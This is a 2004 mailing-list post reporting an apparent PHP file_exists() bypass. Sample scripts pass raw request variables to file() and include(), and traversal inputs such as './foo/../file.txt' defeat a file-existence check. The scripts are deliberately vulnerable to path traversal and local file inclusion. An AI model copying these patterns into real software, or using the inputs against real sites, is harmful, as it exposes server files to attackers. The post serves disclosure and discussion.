Full Disclosure mailing list archives
file_exists() bypassing , critical problem ?
From: "Nourredine Himeur" <lostnoobs () security-challenge com>
Date: Mon, 2 Feb 2004 11:12:28 +0100
Hi, There is a security problem on the file_exists() function who allows unauthorized users to bypassing the function. For example, an user use this function for checking the existence and display the source code of his file "my_file.php" in the "/test" directory. He use for this a script like this one : ----- file_exists.php ----- <?php if(file_exists($var)){ echo("File exist<br><br>"); $source = file( $var ); while ( list( $num_line, $line ) = each( $source ) ) { echo "<B>Line $num_line:</B> ".htmlspecialchars( $line ) . "<br>"; } }else{ echo("File doesn't exist<br<br "); $source = file( $var ); while ( list( $num_line, $line ) = each( $source ) ) { echo "<B>Line $num_line:</B> ".htmlspecialchars( $line ) . "<br>"; } } ? ----- file_exists.php ----- He test his script with the following adress on his server : http://[server]/test/file_exists.php?var=my_file.php The file "my_file.php" contain the following text : ----- my_file.php ----- PHP is a widely-used general-purpose scripting language that is especially suited for Web development and can be embedded into HTML. ----- my_file.php ----- After launching his script, he obtain : ----- http://[server]/test/file_exists.php?var=my_file.php ----- File exist Line 0: PHP is a widely-used Line 1: general-purpose scripting Line 2: language that is especially Line 3: suited for Web development Line 4: and can be embedded into HTML. ----- http://[server]/test/file_exists.php?var=my_file.php ----- Up to here everything seems to be normal. If he test it with another name file, he obtain : ----- http://[server]/test/file_exists.php?var=another_file.php ----- File doesn't exist Warning: file(test): failed to open stream: No such file or directory in /home/xxx/www/test/file_exists.php on line 11 Warning: Variable passed to each() is not an array or object in /home/xxx/www/test/file_exists.php on line 12 ----- http://[server]/test/file_exists.php?var=another_file.php ----- It's normal too... But, if an user test this script for example with the following link : http://[server]/test/file_exists.php?var=anything/../my_file.php, he obtain : ----- http://[server]/test/file_exists.php?var=anything/../my_file.php ----- File doesn't exist Line 0: PHP is a widely-used Line 1: general-purpose scripting Line 2: language that is especially Line 3: suited for Web development Line 4: and can be embedded into HTML. ----- http://[server]/test/file_exists.php?var=anything/../my_file.php ----- We can see that the file_exists() function return that the file doesn't exist, but the source code has been displayed. It's a very critical bug because a malicious user can use it to bypassing the file_exist() protection on a include() script for example. °°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°° Another example more simply: In the same directory : test.php ----------------------------------------------------------- <? if(file_exists($page)){ echo("Sorry the local page is protected"); }else{ include($page); } ?> ----------------------------------------------------------- file.txt ----------------------------------------------------------- Hello Word ----------------------------------------------------------- http://www.example.com/test.php?page=file.txt Result: Sorry the local page is protected http://www.example.com/test.php?page=./foo/../file.txt Result: Hello Word The function file_exists() is bypassing °°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°° I want to know if you thinks that's a real vulnerability or not ? (securityfocus says NO and don't want to publish it) If you have any questions. Don't hesitate to contact me. Nourredine Himeur lostnoobs () security-challenge com www.security-challenge.com
Current thread:
- file_exists() bypassing , critical problem ? Lost Noobs (Feb 02)
- Re: file_exists() bypassing , critical problem ? m.esco (Feb 02)
- <Possible follow-ups>
- file_exists() bypassing , critical problem ? Nourredine Himeur (Feb 02)
- file_exists() bypassing , critical problem ? Nourredine Himeur (Feb 02)
- Re: Re: file_exists() bypassing , critical problem ? Nourredine Himeur (Feb 02)
- Re: Re: file_exists() bypassing , critical problem ? m.esco (Feb 02)
- Re: Re: file_exists() bypassing , critical problem ? Nourredine Himeur (Feb 02)
- Re: Re: file_exists() bypassing , critical problem ? Stefan Esser (Feb 02)
- Re: file_exists() bypassing , critical problem ? Daniel B (Feb 02)
- Re: Re: file_exists() bypassing , critical problem ? m.esco (Feb 02)
- Message not available
- Re: file_exists() bypassing , critical problem ? Nourredine Himeur (Feb 02)
- Re: Re: file_exists() bypassing , critical problem ? VeNoMouS (Feb 02)